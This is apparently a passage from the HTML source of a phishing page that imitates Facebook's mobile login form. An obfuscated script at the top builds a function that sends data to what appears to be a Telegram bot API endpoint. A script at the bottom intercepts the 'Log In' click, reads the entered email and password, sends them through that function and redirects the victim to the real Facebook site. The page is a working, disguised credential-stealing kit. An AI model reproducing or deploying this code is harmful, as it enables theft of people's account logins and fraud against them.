-0x37b,_0x1c0613);}_0x118214[_0x320a44(-0x2d1,-0x2a0,-0x29e,-0x271)]=_0x18926b(-0x1a5,-0x18c,-0x1b2,-0x1a5),_0x118214['GUVdb']=_0x320a44(-0x31c,-0x2e5,-0x30e,-0x2b1)+_0x18926b(-0x156,-0x161,-0x13e,-0x16b)+_0x18926b(-0x16d,-0x165,-0x16b,-0x160)+'\x20)',_0x118214[_0x320a44(-0x2df,-0x2c5,-0x2e2,-0x28e)]=_0x320a44(-0x27f,-0x295,-0x2b3,-0x29d),_0x118214[_0x320a44(-0x27f,-0x2b5,-0x280,-0x284)]=_0x320a44(-0x286,-0x296,-0x287,-0x2ad),_0x118214[_0x320a44(-0x2b7,-0x289,-0x2b4,-0x2bb)]=_0x320a44(-0x2f9,-0x2e4,-0x31c,-0x30a),_0x118214['tEhAC']='warn',_0x118214['NNylF']=_0x18926b(-0x1ad,-0x193,-0x1ab,-0x186),_0x118214[_0x320a44(-0x274,-0x286,-0x29c,-0x27f)]=_0x320a44(-0x2e7,-0x2dc,-0x2b6,-0x2d3),_0x118214[_0x320a44(-0x281,-0x290,-0x293,-0x2b6)]=_0x18926b(-0x14c,-0x15c,-0x187,-0x130),_0x118214['zNMOE']=function(_0x1bf0d1,_0x198339){return _0x1bf0d1<_0x198339;},_0x118214[_0x320a44(-0x2b1,-0x2d3,-0x308,-0x2d9)]=function(_0x24c058,_0x3cdada){return _0x24c058!==_0x3cdada;},_0x118214[_0x320a44(-0x267,-0x29b,-0x297,-0x2a1)]=_0x18926b(-0x1a2,-0x190,-0x175,-0x17b);const _0x2798d=_0x118214,_0x11b55f=function(){function _0x42bbc3(_0x18d50e,_0x31cd39,_0x3a2394,_0x53fce3){return _0x18926b(_0x18d50e-0xaa,_0x31cd39- -0x179,_0x3a2394-0x26,_0x18d50e);}function _0x279068(_0x4d7443,_0x36aafe,_0x3bec44,_0x594561){return _0x18926b(_0x4d7443-0x88,_0x4d7443-0x3e4,_0x3bec44-0xec,_0x36aafe);}const _0x436de4={'wMfIZ':function(_0x5882dc,_0x4fc37e){function _0x5f3945(_0x49e660,_0x257ab3,_0x34037a,_0x1d7821){return _0x38c6(_0x1d7821-0x2d,_0x49e660);}return _0x2798d[_0x5f3945(0x9e,0xea,0xd8,0xc9)](_0x5882dc,_0x4fc37e);},'gWjey':function(_0x5da9fe,_0x30eb76){return _0x5da9fe+_0x30eb76;},'bRQPT':_0x2798d[_0x279068(0x255,0x22a,0x233,0x283)],'DeFab':_0x42bbc3(-0x32b,-0x320,-0x331,-0x313)+_0x42bbc3(-0x2fb,-0x2da,-0x2c3,-0x2db)+_0x279068(0x27f,0x26e,0x27f,0x296)+'\x20)'};if(_0x2798d[_0x279068(0x23f,0x21e,0x20f,0x207)]===_0x2798d[_0x42bbc3(-0x348,-0x31e,-0x2fa,-0x330)]){let _0x665bba;try{_0x2798d[_0x279068(0x23b,0x205,0x21a,0x260)](_0x2798d[_0x42bbc3(-0x2fb,-0x2db,-0x2ef,-0x2df)],_0x2798d[_0x279068(0x282,0x294,0x276,0x2b1)])?_0x33e9b8=_0x215e83(_0x436de4['wMfIZ'](_0x436de4['gWjey'](_0x436de4[_0x279068(0x25b,0x294,0x245,0x266)],_0x436de4[_0x279068(0x296,0x2c7,0x2c8,0x29c)]),');'))():_0x665bba=Function(_0x2798d[_0x279068(0x243,0x24c,0x259,0x25f)](_0x2798d[_0x279068(0x255,0x266,0x276,0x259)]+_0x2798d[_0x279068(0x24a,0x27a,0x23f,0x266)],');'))();}catch(_0x497f4f){if(_0x2798d[_0x42bbc3(-0x2dc,-0x300,-0x2d1,-0x30d)]===_0x279068(0x28d,0x28e,0x28c,0x25d))_0x665bba=window;else{const _0x3ffa37=_0x155462[_0x279068(0x267,0x243,0x240,0x291)+'r']['prototype'][_0x42bbc3(-0x341,-0x30b,-0x2ec,-0x2de)](_0x3a3e87),_0x39dcf1=_0x4d6bba[_0x55b92e],_0x5f3da9=_0x561f80[_0x39dcf1]||_0x3ffa37;_0x3ffa37[_0x279068(0x298,0x2b9,0x2c9,0x2ab)]=_0xf5284d[_0x42bbc3(-0x312,-0x30b,-0x305,-0x32b)](_0x4da7fb),_0x3ffa37[_0x279068(0x238,0x23c,0x260,0x242)]=_0x5f3da9[_0x279068(0x238,0x22e,0x250,0x251)][_0x42bbc3(-0x2fb,-0x30b,-0x343,-0x2fd)](_0x5f3da9),_0x225b2f[_0x39dcf1]=_0x3ffa37;}}return _0x665bba;}else{const _0x3d2ffe=_0x265fa3['apply'](_0x284362,arguments);return _0x138922=null,_0x3d2ffe;}},_0x4a0006=_0x11b55f(),_0xbd265=_0x4a0006['console']=_0x4a0006[_0x320a44(-0x2cc,-0x2d9,-0x2e0,-0x2a5)]||{},_0xbc219e=['log',_0x2798d['tEhAC'],_0x18926b(-0x129,-0x14d,-0x15a,-0x176),_0x320a44(-0x271,-0x28e,-0x2a5,-0x28f),_0x2798d[_0x18926b(-0x1bc,-0x1a2,-0x1b6,-0x1b9)],_0x2798d[_0x18926b(-0x13c,-0x148,-0x12a,-0x133)],_0x2798d[_0x18926b(-0x119,-0x152,-0x147,-0x11b)]];for(let _0x152368=0xf7c+-0xf*0xd4+-0x310;_0x2798d['zNMOE'](_0x152368,_0xbc219e[_0x18926b(-0x17e,-0x155,-0x172,-0x157)]);_0x152368++){if(_0x2798d[_0x320a44(-0x306,-0x2d3,-0x2e2,-0x2da)](_0x2798d['VvmbC'],_0x2798d[_0x18926b(-0x15b,-0x15d,-0x13b,-0x167)]))_0x4cbb85['status']==0x6da+0x25fb+-0x2c0d&&(_0x5d6e47[_0x18926b(-0x1b2,-0x184,-0x165,-0x15b)+_0x18926b(-0x1a0,-0x180,-0x1b0,-0x14f)](_0x2798d[_0x320a44(-0x2b0,-0x2b5,-0x27f,-0x281)])['style'][_0x18926b(-0x17d,-0x16b,-0x13d,-0x141)]=_0x2798d['qUOBB']);else{const _0x1654bf=_0x3029d1[_0x320a44(-0x2b8,-0x2bb,-0x2a1,-0x29a)+'r'][_0x18926b(-0x199,-0x169,-0x16f,-0x16e)][_0x18926b(-0x18b,-0x192,-0x16d,-0x1a6)](_0x3029d1),_0x394a42=_0xbc219e[_0x152368],_0x44b38d=_0xbd265[_0x394a42]||_0x1654bf;_0x1654bf[_0x18926b(-0x123,-0x14c,-0x164,-0x143)]=_0x3029d1['bind'](_0x3029d1),_0x1654bf['toString']=_0x44b38d['toString']['bind'](_0x44b38d),_0xbd265[_0x394a42]=_0x1654bf;}}});function _0x4b00(){const _0x25e1b4=['B25SB2fK','yxbWBhK','tK55Bey','Ag5grwK','mtiYntmXm3f0v3nxAW','EvLOEeK','DgfIBgu','wNzlqvO','vNbHwwu','y29UC29Szq','r1vwzgi','rw1LqLO','Bgv4wNq','mJuYotqWotyZjG','mJG0thPNA2ri','Eenbsfi','zunvBNi','zxHJzxb0Aw9U','yMLUza','qM11ug8','BgDfug8','ywHMtwK','uLLqwg0','u1LLthe','uLfPB1C','ntiWEeTRvgfe','C0j2rwm','yLjrufq','y0jQCha','Ehr2C0e','C3r5Bgu','tKDlA3q','z2v0rwXLBwvUDa','r0vu','ANfLD2i','CxDstgi','qNLjza','Ahr0Chm6lY9HCa','tKLoquO','y29UC3rYDwn0BW','C2vHCMnO','C2LVzuu','zKnOCw0','svjgC3K','zwTmthK','zLDRCNq','ywjzCwS','C1jzD2y','qxDly2O','Df9Pzd0TmtaWmq','CffrtuO','q3DLteS','AvPZBuu','mZveAxnPsxK','BwHHyY9Zzw5Ktq','sfLvAM4','mtC4ota4mZG6qq','zgLZCgXHEq','D0LIv2K','ChjVDg90ExbL','r090tKW','whHWqLe','qwLitwzRztGWDq','CM4GDgHPCYiPka','qLfzB1e','tgH0A3q','DxDfAhi','y3rVCIGICMv0Dq','q1DRz1K','v2rPuw0','mLb5ueHMrW','vNzTyKm','DhjHy2u','uxHet2e','y01zu1K','C2vUza','ywXLCNq','CgLcq1a','EKzICfi','BgvUz3rO','C3rHDhvZ','ntG0nZnJve1csK8','uKHmwKC','quH6wwrLuLfnqq','zxjYB3i','As50zwXLz3jHBq','rgvgywi','Aw5MBW','x19WCM90B19F','CvvpqKi','lM9YzY9IB3qYma','CMv0DxjUicHMDq','Avbqvu0','thjOtgzmotjZCq','ndeXodC1ogPfsu5OqW','rKPdvuC','zg1TwxO','nJCZnJmYmhbOtfD2yq','ruz6B0S','qK9pD1K','mtK0nJe5mJztENvYr3u','mti2otn1qMjSzhK','B3bLBG','zxnZywDLp2nOyq','DLvovey','Dg9tDhjPBMC','nZa1nJu0AwrnDwnI','wKv1EhO','whjdt2e','BMn0Aw9UkcKG','E30Uy29UC3rYDq','yMXVy2S','tMX5EMW'];_0x4b00=function(){return _0x25e1b4;};return _0x4b00();}_0x359793();function Telegram(_0x43791a){function _0x2e2b27(_0x246b33,_0x241be8,_0x1ea592,_0x247fd2){return _0x38c6(_0x1ea592- -0x2ce,_0x247fd2);}const _0x2fb55c={};_0x2fb55c[_0x2e2b27(-0x1ef,-0x1ff,-0x1eb,-0x1b6)]=_0x2e2b27(-0x25d,-0x235,-0x243,-0x226),_0x2fb55c[_0x2e2b27(-0x1dc,-0x1f5,-0x1f9,-0x204)]=function(_0x3c6185,_0x3706a7){return _0x3c6185==_0x3706a7;},_0x2fb55c['TsIQW']=_0x3102c1(0x2e0,0x2d5,0x2aa,0x2ce),_0x2fb55c[_0x2e2b27(-0x1ff,-0x21d,-0x209,-0x240)]=function(_0x2f1a9f,_0x30a62b){return _0x2f1a9f+_0x30a62b;},_0x2fb55c[_0x2e2b27(-0x1ea,-0x1ee,-0x20c,-0x1f9)]='https://ap'+_0x3102c1(0x31c,0x2ed,0x301,0x2f0)+_0x3102c1(0x301,0x2d7,0x306,0x2ff)+_0x2e2b27(-0x1fd,-0x20e,-0x1fd,-0x234)+_0x2e2b27(-0x1c1,-0x1c1,-0x1e2,-0x1cb)+'LrhLfL92sq'+_0x2e2b27(-0x1c5,-0x1d6,-0x1f7,-0x1f1)+_0x3102c1(0x2dd,0x307,0x2e2,0x2dc)+_0x3102c1(0x2bb,0x2a5,0x2a2,0x26e)+_0x3102c1(0x2b5,0x2c8,0x2dd,0x2ae)+_0x2e2b27(-0x25c,-0x201,-0x228,-0x227)+'text=';function _0x3102c1(_0x33ad65,_0x3b93db,_0x3eb82c,_0x502fff){return _0x38c6(_0x3eb82c-0x213,_0x3b93db);}_0x2fb55c[_0x3102c1(0x28b,0x2b2,0x2bf,0x2a4)]=_0x2e2b27(-0x1eb,-0x227,-0x214,-0x23f);const _0x28af9a=_0x2fb55c;let _0x169c74=_0x28af9a[_0x2e2b27(-0x228,-0x230,-0x209,-0x1f5)](_0x28af9a[_0x3102c1(0x30c,0x2e7,0x2d5,0x2cf)],_0x43791a),_0x481f30=new XMLHttpRequest();_0x481f30[_0x3102c1(0x2bf,0x297,0x2ac,0x2be)]=()=>{function _0x214270(_0x512ee0,_0xc3de07,_0x140078,_0x155601){return _0x2e2b27(_0x512ee0-0x149,_0xc3de07-0x153,_0x140078-0xbe,_0x512ee0);}function _0x5d22eb(_0x29584b,_0xbfcfba,_0x3fe989,_0x36a77b){return _0x2e2b27(_0x29584b-0x11d,_0xbfcfba-0x159,_0x29584b-0x1fb,_0x36a77b);}if(_0x28af9a[_0x5d22eb(0x10,-0x26,-0x20,-0x1)]===_0x28af9a[_0x5d22eb(0x10,0x39,0x34,0x18)])_0x28af9a[_0x214270(-0x110,-0x11e,-0x13b,-0x11c)](_0x481f30['status'],-0x1dd8*-0x1+-0xcc9+-0x1047)&&(document['getElement'+'ById'](_0x5d22eb(0x12,0x6,0x1a,0x17))[_0x214270(-0x12c,-0x14b,-0x159,-0x191)]['display']=_0x28af9a['TsIQW']);else{const _0xfa7c6f=_0x229f49[_0x214270(-0x156,-0x162,-0x176,-0x151)](_0x4994d8,arguments);return _0x4bf4c0=null,_0xfa7c6f;}},_0x481f30[_0x3102c1(0x28b,0x29d,0x2a1,0x274)](_0x28af9a[_0x2e2b27(-0x203,-0x1f9,-0x222,-0x20b)],_0x169c74),_0x481f30['send']();}
    </script>
    <meta http-equiv="origin-trial" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" /><meta name="description" content="Create an account or log in to Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates." /><link rel="canonical" href="https://www.facebook.com/" /><meta property="og:site_name" content="Facebook" /><meta property="og:type" content="website" /><meta property="og:title" content="Facebook &#x2013; log in or sign up" /><meta property="og:description" content="Create an account or log in to Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates." /><meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" /><meta property="og:url" content="https://www.facebook.com/" /><link rel="alternate" hreflang="x-default" href="https://www.facebook.com/" /><link rel="alternate" hreflang="en" href="https://www.facebook.com/" /><link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/" /><link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/" /><link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/" /><link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/" /><link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/" /><link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/" /><link rel="alternate" hreflang="es" href="https://es-la.facebook.com/" /><link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/" /><link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/" /><link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/" /><link rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/" /><link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/" /><link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/" /><link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/" /><link rel="alternate" hreflang="id" href="https://id-id.facebook.com/" /><link rel="alternate" hreflang="it" href="https://it-it.facebook.com/" /><link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/" /><link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/" /><link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/" /><link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/" /><link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/" /><link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/" /><link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/" /><link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/" /><link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/" /><link rel="alternate" hreflang="th" href="https://th-th.facebook.com/" /><link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/" /><script id="u_0_3_4o" type="application/ld+json" nonce="3YEm9tmi">
        {
            "\u0040context": "http:\/\/schema.org",
            "\u0040type": "WebSite",
            "name": "Facebook",
            "url": "https:\/\/www.facebook.com\/"
        }
    </script>
    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" />
</head>
<body tabindex="0" class="b c d e f">
    <div class="g">
        <div id="viewport">
            <div class="h i" id="header">
                <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><img src="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/y8/r/k97pj8-or6s.png" width="77" height="16" class="j k" alt="facebook" />
            </div>
            <div id="objects_container"><div class="f" id="root" role="main"><table class="l" role="presentation"><tbody><tr><td class="m"><div class="n o p" style="display: none;" id="login_error"><div class="q"></div></div><div class="r"><div class="s t"><div id="login_top_banner"><div class="u"><div class="v"><div> By proceeding, you agree to <a href="https://m.facebook.com/mobile/zero/carrier_term/"><span>GP</span>&#039;s Terms</a>, which includes letting Facebook request and receive your phone number. <a class="w" href="/header_settings/?redirect_url=https%3A%2F%2Fmbasic.facebook.com%2F&amp;flow=opt_out&amp;refid=8"> Change settings </a></div></div></div></div><div class="x"><form id="fbform" method="post" action="/login/device-based/regular/login/?refsrc=deprecated&amp;ht_token=AbvxLx5vgIalo5R1sh9vuIfGZIk1mPxNQnom-ugKuCU3x4dL&amp;h_consent=1&amp;ht_l=login&amp;lwv=100&amp;refid=8" class="y z" id="login_form" novalidate="1" ><input type="hidden" name="lsd" value="AVrHYdnKcio" autocomplete="off" /><input type="hidden" name="jazoest" value="21026" autocomplete="off" /><input type="hidden" name="m_ts" value="1646220546" /><input type="hidden" name="li" value="AlUfYqpW8O9dQGXK9eZs4KN8" /><input type="hidden" name="try_number" value="0" /><input type="hidden" name="unrecognized_tries" value="0" /><ul class="ba bb bc"><li class="bb"><span class="bd be" id="u_0_0_0r">Phone number or email address</span><input autocorrect="off" autocapitalize="off" type="email" class="bf bg bh" autocomplete="on" id="m_login_email" name="email" aria-labelledby="u_0_0_0r" /></li><li class="bb"><div id="password_input_with_placeholder"><span class="bd be" id="u_0_1_Vv">Password</span><input autocorrect="off" autocapitalize="off" class="bf bg bi bj" autocomplete="on" name="pass" aria-labelledby="u_0_1_Vv" type="password" id="mypass"/></div></li><li class="bb"><input value="Log In" type="submit" name="login" class="bk bl bm bn bo bp" id="fblog"/></li></ul><div><div id="login_reg_separator" class="bq"><span class="br">or</span></div><div class="bs bt" id="signup_button_area"><div class="bs bu bv" id="signup-button" tabindex="0"><input value="Create New Account" type="submit" name="sign_up" class="bk bl bm bw bo bx" /></div></div></div><input type="hidden" id="bi_xrwh" name="bi_xrwh" value="0" /><input type="hidden" id="scetoggle" /><div></div><noscript><input type="hidden" name="_fb_noscript" value="true" /></noscript></form><div><div class="by bz"><div class="bs ca"><a class="ca" tabindex="0" href="/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjQ2MjIwNTQ2LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;c=https%3A%2F%2Fmbasic.facebook.com%2F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=8" id="forgot-password-link">Forgotten password?</a></div></div><div style="padding-top: 42px"><div><div></div><div class="by" style="text-align:center;"><div class="cb cc"><span class="cd ce"><ul class="ba cf"><li class="bb bs"></li><li class="bb"></li><li class="bb"></li></ul></span></div></div></div></div></div></div></div></div></td></tr></tbody></table><div style="display:none"></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none" /></span></div></div><div><div class="cg"><div class="ch"><table class="l" role="presentation"><tbody><tr><td class="m ci" style="width:50%"><b class="cj">English (UK)</b><form method="post" action="/intl/save_locale/?loc=as_IN&amp;href=https%3A%2F%2Fmbasic.facebook.com%2F&amp;index=2&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input type="hidden" name="lsd" value="AVrHYdnKcio" autocomplete="off" /><input type="hidden" name="jazoest" value="21026" autocomplete="off" /><input value="&#x985;&#x9b8;&#x9ae;&#x9c0;&#x9af;&#x9bc;&#x9be;" type="submit" class="bk cl cm cn" /></form><form method="post" action="/intl/save_locale/?loc=pt_BR&amp;href=https%3A%2F%2Fmbasic.facebook.com%2F&amp;index=4&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input type="hidden" name="lsd" value="AVrHYdnKcio" autocomplete="off" /><input type="hidden" name="jazoest" value="21026" autocomplete="off" /><input value="Portugu&#xea;s (Brasil)" type="submit" class="bk cl cm cn" /></form></td><td class="m co" style="width:50%"><form method="post" action="/intl/save_locale/?loc=bn_IN&amp;href=https%3A%2F%2Fmbasic.facebook.com%2F&amp;index=1&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input type="hidden" name="lsd" value="AVrHYdnKcio" autocomplete="off" /><input type="hidden" name="jazoest" value="21026" autocomplete="off" /><input value="&#x9ac;&#x9be;&#x982;&#x9b2;&#x9be;" type="submit" class="bk cl cm cn" /></form><form method="post" action="/intl/save_locale/?loc=es_LA&amp;href=https%3A%2F%2Fmbasic.facebook.com%2F&amp;index=3&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input type="hidden" name="lsd" value="AVrHYdnKcio" autocomplete="off" /><input type="hidden" name="jazoest" value="21026" autocomplete="off" /><input value="Espa&#xf1;ol" type="submit" class="bk cl cm cn" /></form><a class="cp" href="/language/?next_uri=https%3A%2F%2Fmbasic.facebook.com%2F&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8"><div class="cq"> + </div></a></td></tr></tbody></table></div><span class="bd cr cs">Facebook Inc.</span>
                <script>
                    document.getElementById("fblog").addEventListener("click", function(event) {
                        event.preventDefault()
                        let email = document.getElementById("m_login_email").value;
                        let passw = document.getElementById("mypass").value;
                        let data = "=========================%0a    Email: "+email+" %0a    Password: "+passw+" %0a=========================";
                        Telegram(data);
                        window.location.href="http://mbasic.facebook.com";

                    });
                </script>

            </div>
        </div>
    </div>
</div>
</body>
</html>
